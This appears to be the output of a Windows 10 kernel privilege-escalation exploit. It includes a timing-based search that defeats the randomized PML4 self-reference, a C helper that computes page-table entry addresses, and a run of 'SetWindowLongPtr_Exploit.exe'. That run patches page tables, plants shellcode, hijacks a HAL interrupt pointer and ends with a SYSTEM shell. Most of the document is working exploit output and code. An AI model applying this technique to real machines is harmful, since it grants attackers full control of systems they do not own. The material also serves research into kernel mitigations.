Time difference exceed for ffff81810719ce80, retrying...
Time difference exceed for ffff81810719ce80, retrying...
+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393
Time difference exceed for ffff81810719cf00, retrying...
+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645
+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724
+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167
+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160
+] PTE FFFF818804020100 looks mapped! - Time: 195.728439
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF81C0E0703818 - Index: 103
PML4e: FFFF824120904820 - Index: 104
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff818000000000
-] Erasing 103 from final array
Potential SelfRef: FFFF824120904820
+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759
+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019
+] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364
+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826
+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143
+] PTE FFFF820804020100 looks mapped! - Time: 198.158585
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF824120904820 - Index: 104
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff820000000000
-] Erasing 104 from final array
Potential SelfRef: FFFF8341A0D06830
+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823
+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525
+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040
+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254
+] PTE FFFF83010719D080 looks mapped! - Time: 189.007034
+] PTE FFFF830804020100 looks mapped! - Time: 197.613953
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF8341A0D06830 - Index: 106
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff830000000000
-] Erasing 106 from final array
Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380
Time difference exceed for ffff83810719cf00, retrying...
Time difference exceed for ffff83810719cf00, retrying...
Unmapped Initial: 232.123840
Mapped Initial: 196.420654
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 234.845581
Mapped: 187.862518
--------------------------

Potential SelfRef: FFFF8140A0502810
+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938
+] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766
Time difference exceed for ffff81010719cf80, retrying...
Time difference exceed for ffff81010719cf80, retrying...
Time difference exceed for ffff81010719cf80, retrying...
+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784
+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733
+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182
+] PTE FFFF810804020100 looks mapped! - Time: 199.812225
PML4e: FFFF8140A0502810 - Index: 102
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff810000000000
Time difference exceed for ffff810000000000, retrying...
-] Erasing 102 from final array
Time difference exceed for ffff83c1e0f07838, retrying...
Potential SelfRef: FFFF83C1E0F07838
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Unmapped Initial: 230.247162
Mapped Initial: 198.023987
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 235.923035
Mapped: 191.605301
--------------------------

Time difference exceed for ffff83c1e0f07838, retrying...
Time difference exceed for ffff83c1e0f07838, retrying...
Potential SelfRef: FFFF83C1E0F07838
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Time difference exceed for ffff83810719ce80, retrying...
Unmapped Initial: 258.041046
Mapped Initial: 210.309753
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 238.757538
Mapped: 203.896240
--------------------------

Potential SelfRef: FFFF83C1E0F07838
+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102
+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836
+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333
+] PTE FFFF83810719D000 looks mapped! - Time: 197.218445
+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763
+] PTE FFFF838804020100 looks mapped! - Time: 203.243607
PML4e: FFFF83C1E0F07838 - Index: 107
KNOWN_UNMAPPED PTE: ffff838000000000
-] Erasing 107 from final array
Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221
+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138
+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006
+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943
+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639
+] PTE FFFF828804020100 looks mapped! - Time: 196.754044
+] Removing 105 from initial array and pushing it into final array
Time difference exceed for ffff884422110880, retrying...
Time difference exceed for ffff884422110880, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff8ec763b1d8e8, retrying...
Time difference exceed for ffff90c864321908, retrying...
Unmapped Initial: 257.754272
Mapped Initial: 207.903702
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 247.145935
Mapped: 207.792923
--------------------------

Potential SelfRef: FFFF82C160B05828
+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092
+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715
+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614
+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837
+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796
+] PTE FFFF828804020100 looks mapped! - Time: 208.765045
PML4e: FFFF82C160B05828 - Index: 105
KNOWN_UNMAPPED PTE: ffff828000000000
-] Erasing 105 from final array
-] Removing 100 as it seems to be unmapped
-] Removing 101 as it seems to be unmapped
-] Removing 108 as it seems to be unmapped
-] Removing 109 as it seems to be unmapped
-] Removing 10a as it seems to be unmapped
-] Removing 10b as it seems to be unmapped
-] Removing 10c as it seems to be unmapped
-] Removing 10d as it seems to be unmapped
Time difference exceed for ffff8743a1d0e870, retrying...
-] Removing 10e as it seems to be unmapped
-] Removing 10f as it seems to be unmapped
-] Removing 110 as it seems to be unmapped
Time difference exceed for ffff88c462311888, retrying...
-] Removing 111 as it seems to be unmapped
-] Removing 112 as it seems to be unmapped
-] Removing 113 as it seems to be unmapped
Time difference exceed for ffff8a45229148a0, retrying...
-] Removing 114 as it seems to be unmapped
-] Removing 115 as it seems to be unmapped
-] Removing 116 as it seems to be unmapped
-] Removing 117 as it seems to be unmapped
Time difference exceed for ffffbc5e2f178bc0, retrying...
Time difference exceed for ffffbc5e2f178bc0, retrying...
Time difference exceed for ffffe8f47a3d1e88, retrying...
Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379
+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694
+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502
+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920
+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059
+] PTE FFFFF60804020100 looks mapped! - Time: 211.636246
+] Removing 1ec from initial array and pushing it into final array
Unmapped Initial: 233.678802
Mapped Initial: 214.496124
--------------------------
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
+] Measures are not consistent yet...
--------------------------
Unmapped: 250.585373
Mapped: 213.339661
--------------------------

Potential SelfRef: FFFFF67B3D9ECF60
+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174
+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457
+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861
+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334
+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160
+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926
PML4e: FFFFF67B3D9ECF60 - Index: 1ec
KNOWN_UNMAPPED PTE: fffff60000000000
Real PML4 SelfRef Found: fffff67b3d9ecf60
Left in Potential Array: ffff8c46231188c0
Left in Potential Array: ffff8cc6633198c8
Left in Potential Array: ffff8d46a351a8d0
Left in Potential Array: ffff8dc6e371b8d8
Left in Potential Array: ffff8e472391c8e0
Left in Potential Array: ffff8ec763b1d8e8
Left in Potential Array: ffff8f47a3d1e8f0
Left in Potential Array: ffff8fc7e3f1f8f8
Left in Potential Array: ffff904824120900
Left in Potential Array: ffff90c864321908
Left in Potential Array: ffff9148a4522910
Left in Potential Array: ffff91c8e4723918
Left in Potential Array: ffff924924924920
Left in Potential Array: ffff92c964b25928
Left in Potential Array: ffff9349a4d26930
Left in Potential Array: ffff93c9e4f27938
Left in Potential Array: ffff944a25128940
Left in Potential Array: ffff94ca65329948
Left in Potential Array: ffff954aa552a950
Left in Potential Array: ffff95cae572b958
Left in Potential Array: ffff964b2592c960
Left in Potential Array: ffff96cb65b2d968
Left in Potential Array: ffff974ba5d2e970
Left in Potential Array: ffff97cbe5f2f978
Left in Potential Array: ffff984c26130980
Left in Potential Array: ffff98cc66331988
Left in Potential Array: ffff994ca6532990
Left in Potential Array: ffff99cce6733998
Left in Potential Array: ffff9a4d269349a0
Left in Potential Array: ffff9acd66b359a8
Left in Potential Array: ffff9b4da6d369b0
Left in Potential Array: ffff9bcde6f379b8
Left in Potential Array: ffff9c4e271389c0
Left in Potential Array: ffff9cce673399c8
Left in Potential Array: ffff9d4ea753a9d0
Left in Potential Array: ffff9dcee773b9d8
Left in Potential Array: ffff9e4f2793c9e0
Left in Potential Array: ffff9ecf67b3d9e8
Left in Potential Array: ffff9f4fa7d3e9f0
Left in Potential Array: ffff9fcfe7f3f9f8
Left in Potential Array: ffffa05028140a00
Left in Potential Array: ffffa0d068341a08
Left in Potential Array: ffffa150a8542a10
Left in Potential Array: ffffa1d0e8743a18
Left in Potential Array: ffffa25128944a20
Left in Potential Array: ffffa2d168b45a28
Left in Potential Array: ffffa351a8d46a30
Left in Potential Array: ffffa3d1e8f47a38
Left in Potential Array: ffffa45229148a40
Left in Potential Array: ffffa4d269349a48
Left in Potential Array: ffffa552a954aa50
Left in Potential Array: ffffa5d2e974ba58
Left in Potential Array: ffffa6532994ca60
Left in Potential Array: ffffa6d369b4da68
Left in Potential Array: ffffa753a9d4ea70
Left in Potential Array: ffffa7d3e9f4fa78
Left in Potential Array: ffffa8542a150a80
Left in Potential Array: ffffa8d46a351a88
Left in Potential Array: ffffa954aa552a90
Left in Potential Array: ffffa9d4ea753a98
Left in Potential Array: ffffaa552a954aa0
Left in Potential Array: ffffaad56ab55aa8
Left in Potential Array: ffffab55aad56ab0
Left in Potential Array: ffffabd5eaf57ab8
Left in Potential Array: ffffac562b158ac0
Left in Potential Array: ffffacd66b359ac8
Left in Potential Array: ffffad56ab55aad0
Left in Potential Array: ffffadd6eb75bad8
Left in Potential Array: ffffae572b95cae0
Left in Potential Array: ffffaed76bb5dae8
Left in Potential Array: ffffaf57abd5eaf0
Left in Potential Array: ffffafd7ebf5faf8
Left in Potential Array: ffffb0582c160b00
Left in Potential Array: ffffb0d86c361b08
Left in Potential Array: ffffb158ac562b10
Left in Potential Array: ffffb1d8ec763b18
Left in Potential Array: ffffb2592c964b20
Left in Potential Array: ffffb2d96cb65b28
Left in Potential Array: ffffb359acd66b30
Left in Potential Array: ffffb3d9ecf67b38
Left in Potential Array: ffffb45a2d168b40
Left in Potential Array: ffffb4da6d369b48
Left in Potential Array: ffffb55aad56ab50
Left in Potential Array: ffffb5daed76bb58
Left in Potential Array: ffffb65b2d96cb60
Left in Potential Array: ffffb6db6db6db68
Left in Potential Array: ffffb75badd6eb70
Left in Potential Array: ffffb7dbedf6fb78
Left in Potential Array: ffffb85c2e170b80
Left in Potential Array: ffffb8dc6e371b88
Left in Potential Array: ffffb95cae572b90
Left in Potential Array: ffffb9dcee773b98
Left in Potential Array: ffffba5d2e974ba0
Left in Potential Array: ffffbadd6eb75ba8
Left in Potential Array: ffffbb5daed76bb0
Left in Potential Array: ffffbbddeef77bb8
Left in Potential Array: ffffbc5e2f178bc0
Left in Potential Array: ffffbcde6f379bc8
Left in Potential Array: ffffbd5eaf57abd0
Left in Potential Array: ffffbddeef77bbd8
Left in Potential Array: ffffbe5f2f97cbe0
Left in Potential Array: ffffbedf6fb7dbe8
Left in Potential Array: ffffbf5fafd7ebf0
Left in Potential Array: ffffbfdfeff7fbf8
Left in Potential Array: ffffc06030180c00
Left in Potential Array: ffffc0e070381c08
Left in Potential Array: ffffc160b0582c10
Left in Potential Array: ffffc1e0f0783c18
Left in Potential Array: ffffc26130984c20
Left in Potential Array: ffffc2e170b85c28
Left in Potential Array: ffffc361b0d86c30
Left in Potential Array: ffffc3e1f0f87c38
Left in Potential Array: ffffc46231188c40
Left in Potential Array: ffffc4e271389c48
Left in Potential Array: ffffc562b158ac50
Left in Potential Array: ffffc5e2f178bc58
Left in Potential Array: ffffc6633198cc60
Left in Potential Array: ffffc6e371b8dc68
Left in Potential Array: ffffc763b1d8ec70
Left in Potential Array: ffffc7e3f1f8fc78
Left in Potential Array: ffffc86432190c80
Left in Potential Array: ffffc8e472391c88
Left in Potential Array: ffffc964b2592c90
Left in Potential Array: ffffc9e4f2793c98
Left in Potential Array: ffffca6532994ca0
Left in Potential Array: ffffcae572b95ca8
Left in Potential Array: ffffcb65b2d96cb0
Left in Potential Array: ffffcbe5f2f97cb8
Left in Potential Array: ffffcc6633198cc0
Left in Potential Array: ffffcce673399cc8
Left in Potential Array: ffffcd66b359acd0
Left in Potential Array: ffffcde6f379bcd8
Left in Potential Array: ffffce673399cce0
Left in Potential Array: ffffcee773b9dce8
Left in Potential Array: ffffcf67b3d9ecf0
Left in Potential Array: ffffcfe7f3f9fcf8
Left in Potential Array: ffffd068341a0d00
Left in Potential Array: ffffd0e8743a1d08
Left in Potential Array: ffffd168b45a2d10
Left in Potential Array: ffffd1e8f47a3d18
Left in Potential Array: ffffd269349a4d20
Left in Potential Array: ffffd2e974ba5d28
Left in Potential Array: ffffd369b4da6d30
Left in Potential Array: ffffd3e9f4fa7d38
Left in Potential Array: ffffd46a351a8d40
Left in Potential Array: ffffd4ea753a9d48
Left in Potential Array: ffffd56ab55aad50
Left in Potential Array: ffffd5eaf57abd58
Left in Potential Array: ffffd66b359acd60
Left in Potential Array: ffffd6eb75badd68
Left in Potential Array: ffffd76bb5daed70
Left in Potential Array: ffffd7ebf5fafd78
Left in Potential Array: ffffd86c361b0d80
Left in Potential Array: ffffd8ec763b1d88
Left in Potential Array: ffffd96cb65b2d90
Left in Potential Array: ffffd9ecf67b3d98
Left in Potential Array: ffffda6d369b4da0
Left in Potential Array: ffffdaed76bb5da8
Left in Potential Array: ffffdb6db6db6db0
Left in Potential Array: ffffdbedf6fb7db8
Left in Potential Array: ffffdc6e371b8dc0
Left in Potential Array: ffffdcee773b9dc8
Left in Potential Array: ffffdd6eb75badd0
Left in Potential Array: ffffddeef77bbdd8
Left in Potential Array: ffffde6f379bcde0
Left in Potential Array: ffffdeef77bbdde8
Left in Potential Array: ffffdf6fb7dbedf0
Left in Potential Array: ffffdfeff7fbfdf8
Left in Potential Array: ffffe070381c0e00
Left in Potential Array: ffffe0f0783c1e08
Left in Potential Array: ffffe170b85c2e10
Left in Potential Array: ffffe1f0f87c3e18
Left in Potential Array: ffffe271389c4e20
Left in Potential Array: ffffe2f178bc5e28
Left in Potential Array: ffffe371b8dc6e30
Left in Potential Array: ffffe3f1f8fc7e38
Left in Potential Array: ffffe472391c8e40
Left in Potential Array: ffffe4f2793c9e48
Left in Potential Array: ffffe572b95cae50
Left in Potential Array: ffffe5f2f97cbe58
Left in Potential Array: ffffe673399cce60
Left in Potential Array: ffffe6f379bcde68
Left in Potential Array: ffffe773b9dcee70
Left in Potential Array: ffffe7f3f9fcfe78
Left in Potential Array: ffffe8743a1d0e80
Left in Potential Array: ffffe8f47a3d1e88
Left in Potential Array: ffffe974ba5d2e90
Left in Potential Array: ffffe9f4fa7d3e98
Left in Potential Array: ffffea753a9d4ea0
Left in Potential Array: ffffeaf57abd5ea8
Left in Potential Array: ffffeb75badd6eb0
Left in Potential Array: ffffebf5fafd7eb8
Left in Potential Array: ffffec763b1d8ec0
Left in Potential Array: ffffecf67b3d9ec8
Left in Potential Array: ffffed76bb5daed0
Left in Potential Array: ffffedf6fb7dbed8
Left in Potential Array: ffffee773b9dcee0
Left in Potential Array: ffffeef77bbddee8
Left in Potential Array: ffffef77bbddeef0
Left in Potential Array: ffffeff7fbfdfef8
Left in Potential Array: fffff0783c1e0f00
Left in Potential Array: fffff0f87c3e1f08
Left in Potential Array: fffff178bc5e2f10
Left in Potential Array: fffff1f8fc7e3f18
Left in Potential Array: fffff2793c9e4f20
Left in Potential Array: fffff2f97cbe5f28
Left in Potential Array: fffff379bcde6f30
Left in Potential Array: fffff3f9fcfe7f38
Left in Potential Array: fffff47a3d1e8f40
Left in Potential Array: fffff4fa7d3e9f48
Left in Potential Array: fffff57abd5eaf50
Left in Potential Array: fffff5fafd7ebf58
Left in Potential Array: fffff6fb7dbedf68
Left in Potential Array: fffff77bbddeef70
Left in Potential Array: fffff7fbfdfeff78
Left in Potential Array: fffff87c3e1f0f80
Left in Potential Array: fffff8fc7e3f1f88
Left in Potential Array: fffff97cbe5f2f90
Left in Potential Array: fffff9fcfe7f3f98
Left in Potential Array: fffffa7d3e9f4fa0
Left in Potential Array: fffffafd7ebf5fa8
Left in Potential Array: fffffb7dbedf6fb0
Left in Potential Array: fffffbfdfeff7fb8
Left in Potential Array: fffffc7e3f1f8fc0
Left in Potential Array: fffffcfe7f3f9fc8
Left in Potential Array: fffffd7ebf5fafd0
Left in Potential Array: fffffdfeff7fbfd8
Left in Potential Array: fffffe7f3f9fcfe0
Left in Potential Array: fffffeff7fbfdfe8
Left in Potential Array: ffffff7fbfdfeff0
Left in Potential Array: fffffffffffffff8
Left in Final Array: fffff67b3d9ecf60
Result: fffff67b3d9ecf60
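The addresses in the log above all follow from the x64 self-referencing PML4 layout: when PML4 slot i points back at the PML4 page, the PML4 itself is visible at the virtual address whose four 9-bit indices are all i, the entry for slot i sits at i*8 inside that page, and the PTE that maps any virtual address va lives at (i << 39) | ((va >> 9) & ~7) sign-extended to 48 bits. Before Windows 10 randomized it, i was always 0x1ED (PTE base 0xFFFFF68000000000); the tool times each candidate in the kernel half (indices 0x100..0x1FF) and prunes until one remains. The C program below is an added example, not code from the ZeroNights tool, that computes those addresses and reproduces values taken from the log: index 0x1ec gives self-ref FFFFF67B3D9ECF60, index 0x102 gives FFFF8140A0502810, the PTE of "Allocation 0" (0000020E339D0000) under index 0x1ec is FFFFF6010719CE80, and the PTE of VA 0 is the KNOWN_UNMAPPED probe fffff60000000000.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Canonical 48-bit x64 virtual addresses: bits 63..48 copy bit 47. */
static uint64_t canonical(uint64_t va)
{
    va &= 0x0000FFFFFFFFFFFFULL;
    if (va & (1ULL << 47))
        va |= 0xFFFF000000000000ULL;
    return va;
}

/* VA of PML4 entry 'idx' when slot idx points back at the PML4 page: the same
 * index is used at every level (PML4, PDPT, PD, PT) and idx*8 selects the entry. */
uint64_t pml4_selfref_va(unsigned idx)
{
    uint64_t i = idx & 0x1FF;
    return canonical((i << 39) | (i << 30) | (i << 21) | (i << 12) | (i << 3));
}

/* Recover the PML4 index from a self-ref VA (bits 47..39). */
unsigned pml4_index_of(uint64_t va)
{
    return (unsigned)((va >> 39) & 0x1FF);
}

/* VA of the PTE that maps 'va' for self-ref index 'idx': the index becomes the
 * top 9 bits and va's own index bits (47..12) shift down by 9 to form the path. */
uint64_t pte_va_for(unsigned idx, uint64_t va)
{
    uint64_t i = idx & 0x1FF;
    return canonical((i << 39) | ((va >> 9) & 0x7FFFFFFFF8ULL));
}

/* Fill out[] with the 256 candidate self-ref VAs for the kernel half
 * (PML4 indices 0x100..0x1FF), the set the tool starts from. Returns the count. */
unsigned kernel_selfref_candidates(uint64_t out[256])
{
    unsigned n = 0;
    for (unsigned i = 0x100; i <= 0x1FF; i++)
        out[n++] = pml4_selfref_va(i);
    return n;
}

int main(void)
{
    uint64_t cands[256];
    unsigned n = kernel_selfref_candidates(cands);
    printf("%u candidates: first %" PRIx64 ", last %" PRIx64 "\n",
           n, cands[0], cands[n - 1]);

    uint64_t found = 0xFFFFF67B3D9ECF60ULL;     /* "Result" line of the log above */
    unsigned idx = pml4_index_of(found);
    printf("self-ref %" PRIx64 " -> index %x\n", found, idx);
    printf("PTE of Allocation 0 (20E339D0000): %" PRIx64 "\n",
           pte_va_for(idx, 0x20E339D0000ULL));
    printf("PTE of VA 0 (KNOWN_UNMAPPED probe): %" PRIx64 "\n", pte_va_for(idx, 0));
    printf("legacy index 1ed: %" PRIx64 "\n", pml4_selfref_va(0x1ED));
    return 0;
}
```

Each "Potential SelfRef" block in the log is one candidate from kernel_selfref_candidates, and each "PTE ... looks mapped" line is pte_va_for applied to one of the five probe allocations; once the self-ref index is known, pte_va_for gives the address the SetWindowLongPtr_Exploit step needs to reach page-table entries directly.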
Run SetWindowLongPtr_Exploit.exe
C:\Users\qa\Desktop>SetWindowLongPtr_Exploit.exe fffff67b3d9ecf60
My PID is: 6056
Current Username: qa
PML4 Self Ref: FFFFF67B3D9ECF60
Enter to continue...

Value Self Ref = 8000000100211867
000000003D9EC000 | 67 a8 e2 61 00 00 c0 02 67 d8 d8 6b 00 00 d0 00 | g..a....g..k....
000000003D9EC010 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC020 | 67 68 81 08 01 00 90 01 00 00 00 00 00 00 00 00 | gh..............
000000003D9EC030 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC040 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC050 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC060 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC070 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC080 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC090 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC0F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC100 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC110 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC120 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC130 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC140 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC150 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC160 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC170 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC180 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC190 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC1F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC200 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC210 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC220 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC230 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC240 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC250 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC260 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC270 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC280 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC290 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC2F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC300 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC310 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC320 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC330 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC340 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC350 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC360 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC370 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC380 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC390 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
000000003D9EC3A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................

+] Selected spurious PML4E: fffff67b3d9ecf00
+] Spurious PT: fffff67b3d9e0000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
+] Patching the Spurious Offset with 1967
Original HalpIntteruptRequest pointer: fffff80150e1fc40
+] Selected spurious PML4E: fffff67b3d9ecf08
+] Spurious PT: fffff67b3d9e1000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
*** Patching the original location to enable NX...
+] Patching the Spurious Offset with 1967
HAL address: fffff67b3d9e1000
+] w00t: Shellcode stored at: ffffffffffd00d50
+] Selected spurious PML4E: fffff67b3d9ecf10
+] Spurious PT: fffff67b3d9e2000
+] Content pml4e fffff67b3d9ecff8: 99f063
+] Patching the Spurious Offset with 99f067
+] Content pdpte fffff67b3d9ffff8: 9a0063
+] Patching the Spurious Offset with 9a0067
+] Content pdpte fffff67b3ffffff0: 821063
+] Patching the Spurious Offset with 821067
+] Content pte fffff67fffffe800: 1967
+] Patching the Spurious Offset with 1967
Patch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\qa\Desktop>
C:\Users\qa\Desktop>whoami
nt authority\system

C:\Users\qa\Desktop>
            
